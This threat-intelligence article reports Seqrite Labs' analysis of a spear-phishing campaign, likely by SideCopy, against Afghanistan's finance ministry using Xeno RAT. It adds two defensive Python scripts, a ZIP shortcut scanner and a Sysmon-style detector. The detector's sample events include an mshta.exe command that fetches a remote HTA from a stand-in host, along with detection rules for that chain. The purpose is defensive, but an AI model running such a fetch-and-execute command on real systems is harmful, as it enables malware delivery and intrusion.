SideCopy Hits Afghanistan's Finance Ministry With Xeno RAT in Operation XENOFISCAL
Seqrite Labs says the Pakistan-aligned group SideCopy likely ran Operation XENOFISCAL, a spear-phishing campaign that hit Afghanistan's Ministry of Finance and provincial finance offices with the open-source Xeno RAT, delivered through a Pashto-language ZIP-and-LNK lure.
The lure is the tell: a shortcut file with a Pashto-language name, aimed at the one ministry that moves a government's money. This is patient, language-aware espionage, executed with a remote access trojan anyone can download.
PUNE, India — Seqrite Labs has disclosed a spear-phishing campaign, codenamed Operation XENOFISCAL, that it assesses was likely undertaken by the Pakistan-aligned threat group SideCopy against Afghanistan's Ministry of Finance, deploying the open-source remote access trojan Xeno RAT. The Hacker News reported the findings on June 2, 2026.
Beyond the finance ministry itself, Seqrite says the campaign also targeted provincial revenue and finance directorates, Pashto-speaking government officials and provincial-level government employees — a target set, and a choice of lure language, that the researchers read as reflecting close familiarity with the Afghan government environment.
What Happened
Seqrite Labs researcher Dixit Panchal documented a spear-phishing operation, codenamed Operation XENOFISCAL, that the firm assesses was likely carried out by SideCopy — a Pakistan-aligned threat group that operates under the broader Transparent Tribe, or APT36, umbrella — against Afghanistan's Ministry of Finance. The campaign also reached provincial revenue and finance directorates, Pashto-speaking government officials and provincial-level government employees. As Panchal put it, the operation 'opens with a spear phishing delivery — a ZIP archive containing a malicious LNK file bearing a carefully crafted Pashto-language filename.' Pashto is the main language of Afghan government circles, and Seqrite reads its use in the lure as a deliberate signal of the attacker's familiarity with the target environment.
Once the shortcut file runs, it uses the Windows utility mshta.exe to fetch a remote HTML Application from a compromised Afghan education domain, executing obfuscated JavaScript in memory. The malware establishes Registry-based persistence by mimicking Microsoft Edge and, through a DLL-based loader, drops Xeno RAT version 1.8.7 alongside a decoy document used as a distraction. Xeno RAT is an open-source remote access trojan that connects to a remote server over TCP and accepts operator commands; Seqrite documents a broad capability set including modular DLL loading, scheduled-task launch, antivirus reconnaissance, SOCKS5 proxy tunneling, file operations, keylogging, screenshots, clipboard monitoring, webcam and microphone tracking, the ability to delete its own persistence, and self-uninstallation.
Who SideCopy Is — and the Hedge That Belongs on It
SideCopy is the name researchers give to a Pakistan-linked threat group that operates under the wider Transparent Tribe, also known as APT36, umbrella, and that has historically used a range of malware families to steal data from compromised hosts. It is worth preserving the qualifier Seqrite itself uses: the firm frames XENOFISCAL as a campaign 'likely' undertaken by SideCopy, not a confirmed one, and 'Pakistan-aligned' or 'Pakistan-linked' is the careful phrasing rather than a flat statement of state direction. That precision matters in attribution reporting, where the gap between 'consistent with a known group's tradecraft' and 'definitively attributed' is real. What is well-established is the lineage: in April 2025 SideCopy was tied to a set of attacks on Indian sectors using Xeno RAT, Spark RAT and CurlBack RAT, and the Afghan finance-ministry campaign reads as a continuation of that broader cluster of activity aimed at South Asian entities.
Pakistan-Afghanistan Friction Moves Into the Cyber Domain
The target selection is the geopolitics. A campaign aimed squarely at Afghanistan's Ministry of Finance, its provincial revenue and finance directorates, and Pashto-speaking officials is an espionage operation against the financial machinery of the Afghan state — and the deliberate use of Pashto in the lure file shows an operator who understands that machinery from the inside. Read alongside SideCopy's documented history of targeting India, the campaign fits a pattern of a Pakistan-aligned actor conducting cyber-espionage across its immediate strategic neighborhood. For defenders, the practical implication is one of scope: organizations that touch the Afghan government, run NGO operations in Afghanistan, or handle Afghan diaspora and cross-border financial communications should consider themselves potentially in SideCopy's sights, and treat Pashto-language government-themed attachments with corresponding suspicion.
Off-the-Shelf RATs in State-Aligned Hands
The choice of Xeno RAT — an open-source trojan anyone can download — is part of a durable trend: state-aligned operators increasingly reach for off-the-shelf and open-source tooling rather than bespoke implants, because commodity tools are cheaper, give a degree of attribution deniability, and blend into the noise of criminal activity. The CyberSignal has tracked the same convergence across alignments: the Kimsuky HTTPSpy backdoor aimed at the South Korean military, the Kimsuky PebbleDash activity hitting defense sectors with LLM-developed code, the WebWorm cluster's use of Discord and OneDrive for command-and-control, Iran's Nimbus Manticore aviation-sector targeting and MuddyWater's false-flag tradecraft, and China's Shadow Earth-053 espionage across Asia. SideCopy adopting Xeno RAT is the South Asian entry in that same ledger — and a reminder that the open-source-RAT baseline now spans Russian, Chinese, Iranian, North Korean and Pakistani-aligned operators alike.
Scope and Impact
The direct victims are Afghan government finance entities, which bounds the immediate impact to a specific geopolitical theater. But the relevant scope for most defenders is the lure mechanics rather than the named target, because the techniques generalize cleanly. A ZIP-delivered LNK file that invokes mshta.exe to pull a remote HTA, runs JavaScript in memory, and persists by impersonating a browser is a portable tradecraft pattern, not an Afghanistan-specific one. Any organization whose users open attachments — which is to say, every organization — should recognize the LNK-via-ZIP and mshta-fetches-HTA chain as a high-signal detection opportunity regardless of whether SideCopy is the actor. The use of a compromised Afghan education domain to stage the second-stage HTA is also instructive: the operators borrowed legitimate, regionally appropriate infrastructure to host their payload, which both improves the lure's credibility and frustrates simple domain-reputation blocking, since the host is a real institution rather than a freshly registered attacker domain.
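To make the gateway side of that detection opportunity concrete, here is an added Python example, written for this article rather than taken from Seqrite's report or the article's author, that inspects a ZIP attachment for shortcut files. It identifies members both by the .lnk extension and by the shortcut file header bytes, so a shortcut renamed to look like a document is still caught, and it flags the double-extension pattern (a shortcut named like a PDF). The archive contents, member names and the document-extension list are constructed for the example; the shortcut members carry only a header and are not functional shortcuts.

```python
import io
import zipfile

# Every Windows shortcut starts with HeaderSize 0x0000004C followed by the LinkCLSID
# {00021401-0000-0000-C000-000000000046}; matching these bytes catches shortcuts
# whose extension has been disguised or whose name is non-ASCII (as in a Pashto lure).
LNK_MAGIC = bytes.fromhex("4c000000" "0114020000000000c000000000000046")

# Extensions a user expects to be documents; a shortcut named like one is a classic lure.
# Assumed list for the example; extend it to match the document types your users receive.
DOC_EXTENSIONS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt")


def is_lnk_bytes(head: bytes) -> bool:
    """True if the first 20 bytes match the shortcut file header."""
    return head[: len(LNK_MAGIC)] == LNK_MAGIC


def scan_zip_attachment(zip_bytes: bytes) -> list:
    """Inspect each member of a ZIP attachment and return findings for shortcut files.

    Each finding is {"name": member name, "reasons": [...]}. Members are identified
    by extension and by header bytes, so a renamed shortcut is still caught.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as member:
                head = member.read(len(LNK_MAGIC))  # header only; no need to inflate the rest
            lower = info.filename.lower()
            reasons = []
            if lower.endswith(".lnk"):
                reasons.append("lnk_extension")
                stem = lower[: -len(".lnk")]
                if stem.endswith(DOC_EXTENSIONS):
                    reasons.append("double_extension")  # e.g. report.pdf.lnk
            if is_lnk_bytes(head):
                reasons.append("lnk_header")
                if not lower.endswith(".lnk"):
                    reasons.append("extension_mismatch")  # shortcut disguised as another type
            if reasons:
                findings.append({"name": info.filename, "reasons": reasons})
    return findings


def should_quarantine(zip_bytes: bytes) -> bool:
    """Gateway policy: a shortcut inside an inbound archive is hostile by default."""
    return bool(scan_zip_attachment(zip_bytes))


def build_sample_zip() -> bytes:
    """Constructed test archive: two shortcut-like members and one benign document.

    The shortcut members carry only the 20-byte header plus zero padding; they are
    not functional shortcuts and do nothing if opened.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("budget_report.pdf.lnk", LNK_MAGIC + b"\x00" * 56)
        zf.writestr("notes.txt", LNK_MAGIC + b"\x00" * 56)  # shortcut renamed to look like text
        zf.writestr("readme.docx", b"PK\x03\x04 constructed placeholder document bytes")
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_zip()
    for finding in scan_zip_attachment(sample):
        print(finding["name"], "->", ", ".join(finding["reasons"]))
    print("quarantine:", should_quarantine(sample))
```

The check deliberately keys on bytes rather than on the filename: a lure like the one Seqrite describes carries a non-ASCII Pashto name, and a name-based rule tuned to English phishing would not see it, whereas the header check is language-independent. Reading only the first 20 bytes of each member also keeps the scan cheap on large or nested archives.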
On the malware itself, Xeno RAT 1.8.7's capability list is the espionage operator's standard kit: persistent remote control, keystroke and screen capture, clipboard and audio/video surveillance, file theft, and network tunneling for pivoting. Because it is open-source and versioned, defenders benefit from the fact that its network signature and behaviors are documented in public pentest and threat-intelligence literature — a rare case where the commodity nature of the tool aids the defender. The decoy document dropped alongside it is the social-engineering finishing touch: it gives the victim something plausible to look at while the RAT installs, which is exactly the kind of detail that makes a Pashto-language government lure effective against a busy ministry employee.
Response and Attribution
For organizations in or adjacent to SideCopy's target set — Afghan government bodies, NGOs operating in Afghanistan, and entities handling Afghan cross-border or diaspora communications — the response starts at the email gateway: inspect inbound ZIP attachments for embedded LNK files, treat shortcut files arriving by email as hostile by default, and apply elevated scrutiny to government-themed or Pashto-language attachments. Detection engineering should flag the specific chain Seqrite documents — LNK spawning mshta.exe, mshta reaching out to fetch an HTA, and new Registry run-keys that impersonate Microsoft Edge — and hunt for Xeno RAT's documented TCP command-and-control behavior, with teams pivoting onto Seqrite's published indicators of compromise as soon as they are available.
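As an added example of the host-side detection logic described above (not Seqrite's detection content and not the article's own code), the Python below runs the checks over constructed Sysmon-style process-creation and registry events: mshta.exe launched with a remote URL on its command line, the same chain escalated when explorer.exe is the parent (what a double-clicked shortcut typically looks like in telemetry, stated as an assumption in the code), and a Run-key value whose name or target claims to be Edge but points outside Edge's installation directories. The event records, user paths, SIDs and host names are constructed, and the Edge directory list is an assumption to be tuned per environment.

```python
import re

# Constructed Sysmon-style records (fields modelled on Event ID 1, process creation,
# and Event ID 13, registry value set). Sample data written for this example; none of
# these paths, hosts or SIDs come from Seqrite's report.
SAMPLE_EVENTS = [
    {"type": "process_create", "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'"C:\Windows\System32\mshta.exe" http://stage.example.invalid/notice.hta'},
    {"type": "process_create",
     "image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"'},
    {"type": "registry_set",
     "target_object": r"HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeUpdate",
     "details": r"C:\Users\alice\AppData\Roaming\EdgeUpdate\msedge.exe"},
    {"type": "registry_set",
     "target_object": r"HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "details": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'},
    {"type": "process_create", "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"mshta.exe C:\Tools\inventory.hta"},  # local HTA run by an admin script
]

# Where a genuine Edge binary lives (assumed list; extend it for per-user installs).
EDGE_INSTALL_DIRS = (
    "c:\\program files (x86)\\microsoft\\edge\\application\\",
    "c:\\program files\\microsoft\\edge\\application\\",
)
REMOTE_URL = re.compile(r"\b(?:https?|ftp)://", re.IGNORECASE)
RUN_KEY = re.compile(r"\\currentversion\\run(?:once)?\\([^\\]+)$", re.IGNORECASE)


def basename(win_path: str) -> str:
    # os.path.basename does not split on backslashes off Windows, so do it by hand.
    return win_path.rsplit("\\", 1)[-1].lower()


def first_token(command: str) -> str:
    """Return the executable path from a command line, honouring a quoted path."""
    command = command.strip()
    if command.startswith('"'):
        return command[1:].split('"', 1)[0]
    return command.split(" ", 1)[0]


def check_process(ev: dict) -> list:
    """mshta.exe pulling an HTA from a remote URL; critical when parented by explorer.exe."""
    if basename(ev["image"]) != "mshta.exe" or not REMOTE_URL.search(ev["command_line"]):
        return []
    severity = "high"
    # Assumption: a double-clicked shortcut runs its target under explorer.exe, so
    # explorer.exe -> mshta.exe -> remote URL is the LNK-to-HTA chain in telemetry.
    if basename(ev["parent_image"]) == "explorer.exe":
        severity = "critical"
    return [{"rule": "mshta_remote_hta", "severity": severity}]


def check_registry(ev: dict) -> list:
    """Run-key value that claims to be Edge but launches a binary outside Edge's directories."""
    match = RUN_KEY.search(ev["target_object"])
    if not match:
        return []
    value_name = match.group(1).lower()
    details = ev["details"].lower()
    claims_edge = "edge" in value_name or "msedge" in details
    exe_path = first_token(details)
    genuine_location = any(exe_path.startswith(d) for d in EDGE_INSTALL_DIRS)
    if claims_edge and not genuine_location:
        return [{"rule": "run_key_edge_impersonation", "severity": "high"}]
    return []


def detect(events: list) -> list:
    """Run every check over the events and return alerts tagged with the event index."""
    alerts = []
    for index, ev in enumerate(events):
        checker = check_process if ev["type"] == "process_create" else check_registry
        for alert in checker(ev):
            alerts.append({"index": index, **alert})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Two design points carry over to real detection content. The mshta rule keys on a remote URL in the command line rather than on mshta.exe alone, because local HTA use by administrative tooling is common enough to bury an image-name-only rule in noise; the parent-process escalation then separates the double-clicked-shortcut case from everything else. The Run-key rule compares the launched path against where Edge actually installs, so a value that merely borrows the Edge name is caught without blocking legitimate browser entries.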
On attribution, the disciplined position is to carry Seqrite's hedge through: this is a campaign 'likely' run by SideCopy, a 'Pakistan-aligned' group under the Transparent Tribe umbrella, and the evidence is consistency of tradecraft and target rather than a definitive fingerprint. That is a strong assessment worth acting on, but it is an assessment, and reporting it as settled fact would overstate what the research claims. SOC and threat-intelligence teams should treat the SideCopy / Transparent Tribe TTPs as the working hypothesis when they see this chain against South Asian government targets, while leaving room for the possibility — inherent to commodity tooling like Xeno RAT — that a different operator borrowed the same playbook.
The CyberSignal Analysis
Signal 01 — The Lure Language Is the Intelligence
It is easy to focus on Xeno RAT and miss that the most revealing artifact in this campaign is the filename. A shortcut file with a carefully crafted Pashto-language name, aimed at the Afghan finance ministry and Pashto-speaking officials, is not a generic phishing blast — it is a lure built by someone who knows that Pashto is the working language of Afghan government circles and who tailored the bait accordingly. For defenders, that is both a threat indicator and a defensive lesson: language-aware, target-specific lures defeat the generic 'looks like spam' heuristic that catches mass phishing, and the populations most exposed to this kind of operation need training and filtering tuned to their actual linguistic and bureaucratic context, not a one-size-fits-all model built around English-language commodity phishing.
Signal 02 — Open-Source RATs Are the New Common Tongue of Espionage
Xeno RAT in SideCopy's hands is one more data point in a trend that has become the rule rather than the exception: state-aligned operators across every major alignment now reach for open-source and off-the-shelf remote access trojans. The strategic logic is sound from the attacker's side — commodity tools are free, capable, and muddy attribution by making a state operation look like routine crime. The defensive implication cuts both ways. On one hand, an organization can no longer infer a sophisticated adversary from a commodity tool, because Xeno RAT is equally at home in a criminal kit and a state campaign. On the other, the public documentation of these tools is a gift: their behaviors and network signatures are known, so detection content for the open-source-RAT baseline protects against a wide range of actors at once. Building robust detection for the common tools is now higher-leverage than chasing bespoke implants.
Signal 03 — South Asia Is an Under-Covered but Active Theater
Russian, Chinese, Iranian and North Korean operations dominate Western threat-intelligence attention, but the South Asian APT cluster — SideCopy, Transparent Tribe and their counterparts — is consistently active and consistently under-covered relative to its operational tempo. Operation XENOFISCAL is a reminder that Pakistan-Afghanistan and Pakistan-India strategic competition plays out in the cyber domain as routine background activity, with real government targets and real espionage outcomes. For organizations with any footprint in the region, the takeaway is to give South Asian state-aligned threats the same standing in the threat model that the better-publicized clusters already enjoy, rather than treating them as a regional footnote — the targeting is specific, the tooling is capable, and the operational cadence is steady.